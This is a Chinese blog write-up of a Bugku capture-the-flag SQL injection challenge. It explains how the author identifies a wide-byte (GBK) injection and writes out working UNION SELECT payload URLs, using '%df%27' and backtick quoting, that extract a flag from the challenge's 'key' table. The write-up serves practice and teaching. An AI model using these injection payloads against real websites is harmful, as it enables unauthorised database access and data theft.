sql注入——bugku

刚刚做了bugku的题目,现在整理一下

写出解题思路,希望能够帮助到那些需要帮助的人

所有的wp都是以一题一篇的形式写出

主要是为了能够让读者更好的阅读以及查找,

希望你们不要责怪!!共勉!!!

永远爱你们的————新宝宝

 

sql注入

50

 

http://103.238.227.13:10083/

格式KEY{}

 sql注入——bugku

解题思路:这一题涉及的知识点比较多(有可能我太菜了吧QAQ)

打开链接就会得到:

sql注入——bugku

很明显可以看出查询key表,id=1的string字段

我们去构造payload:

103.238.227.13:10083/?id=2 union select 1,string from 'key'#

就会得到:

sql注入——bugku

我们什么都没有发现呀,还是需要重新开始看一下是什么注入:

sql注入——bugku

发现id=1和id=1’窦娥米有出现问题,这个时候我们就可以想到是宽字节注入,试一下

sql注入——bugku

果然是的,有关于宽字节注入的信息可以看这里:https://www.cnblogs.com/lxz-1263030049/p/9297935.html

那么我们就可以构造一下payload:

103.238.227.13:10083/?id=1%df%27 union select 1,string from 'key'#

sql注入——bugku

我们试一下另一种引号方式

103.238.227.13:10083/?id=1%df%27 union select 1,string from `key`#

 

这种引号是在tab键的上方:

sql注入——bugku

还是报错不过错误的位置换了一下

我们把#键换为%23就会得到:

103.238.227.13:10083/?id=1%df%27 union select 1,string from `key`%23

就会得到:

sql注入——bugku

注意最后的格式哦!!!

 

您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力。

sql注入——bugkusql注入——bugku
作者:落花四月
关于作者:潜心于网络安全学习。如有问题或建议,请多多赐教!
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接.
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!